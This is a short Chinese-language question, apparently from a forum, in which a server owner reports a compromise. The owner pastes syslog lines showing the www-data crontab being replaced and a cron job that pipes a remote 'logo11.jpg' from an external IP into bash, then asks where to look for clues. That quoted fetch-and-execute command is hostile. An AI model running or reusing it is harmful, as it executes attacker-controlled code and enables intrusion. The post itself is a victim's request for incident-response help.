我的服务器肯定受到了损害。现在我想找到黑客进入服务器的位置。在攻击之前,我可以在 syslog 中看到:
May 13 01:28:23 eee crontab[10680]: (www-data) DELETE (www-data)
May 13 01:28:23 eee crontab[10681]: (www-data) REPLACE (www-data)
May 13 01:29:01 eee cron[955]: (www-data) RELOAD (crontabs/www-data)
May 13 01:29:01 eee CRON[10697]: (www-data) CMD (curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s)
它能够添加 cronjob 并调用一些图像文件。我在哪里寻找线索?谢谢你。
